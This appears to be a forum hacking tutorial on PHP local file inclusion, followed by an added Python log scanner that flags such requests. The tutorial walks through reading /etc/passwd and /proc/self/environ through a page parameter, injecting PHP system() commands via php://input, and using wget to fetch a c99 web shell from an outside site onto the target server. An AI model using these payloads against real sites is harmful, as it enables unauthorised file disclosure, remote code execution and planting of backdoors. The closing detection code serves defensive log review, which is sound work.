Code:
http://www.site.com/index.php?page=
Anything similar to that will do, as long as you are able to read files and obtain an "include" error.
First things first, give it a shot and see if you can read "/etc/passwd".
The URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll get a page that looks like this:
[Image: AGx7w.png]
Now let's try reading:
Code:
/proc/self/environ
/proc/self/fd
So the URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
[Image: E4Ri0.png]
Well, not to worry, it's time to use our backup method. The "php://input" method will help us read files with certain commands, and hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers".
I'll show you how to exploit via php://input using the "Hackbar".
So let's check what we're supposed to use in the Hackbar:
[Image: NC62R.png]
Now let's try putting this method in action.
Look at the picture carefully.
[Image: vMZKf.png]
The URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands:
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now, shall we?
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell.
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's going to look:
[Image: qlJRO.png]
Now that you've spawned a shell, you can navigate to your shell on the site.
Code:
http://www.site.com/shell.php
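
From the defender's side, the requests shown in this post leave a recognisable trace in the web server's access log. The following is an added example, not part of the original post: a Python scanner that flags query parameters carrying an absolute path, a /proc/self file, a null byte or a stream wrapper such as php://input. The log lines, the combined log format and the rule names are constructed for illustration, and the rules assume parameters that are only meant to carry a page name.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format (not taken from the post).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?page=%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 312',
    '203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 97',
    '198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "POST /contact.php?topic=input HTTP/1.1" 200 800',
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each rule inspects the decoded value of one query parameter.
RULES = [
    ("stream-wrapper", re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)),
    ("proc-self", re.compile(r"^/proc/self/(environ|fd)\b")),
    ("absolute-path", re.compile(r"^/")),
    ("null-byte", re.compile(r"\x00")),
]

def scan_line(line):
    """Return a list of alerts (dicts) for one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    alerts = []
    query = m.group("target").partition("?")[2]
    # parse_qsl percent-decodes, so %2Fproc and %00 are matched in decoded form.
    for param, value in parse_qsl(query, keep_blank_values=True):
        rules = sorted(name for name, rx in RULES if rx.search(value))
        if not rules:
            continue
        # php://input on a POST: the request body is what include() reads.
        body_included = (value.strip().lower().startswith("php://input")
                         and m.group("method") == "POST")
        alerts.append({"ip": m.group("ip"), "param": param, "rules": rules,
                       "severity": "critical" if body_included else "high"})
    return alerts

def scan(lines):
    """Map line index -> alerts, skipping clean lines."""
    results = {i: scan_line(line) for i, line in enumerate(lines)}
    return {i: a for i, a in results.items() if a}

if __name__ == "__main__":
    for idx, alerts in scan(SAMPLE_LOG).items():
        print(idx, alerts)
```

A hit rated "critical" means the include parameter pointed at the request body, so the application's include call and the allow_url_include setting should be reviewed first.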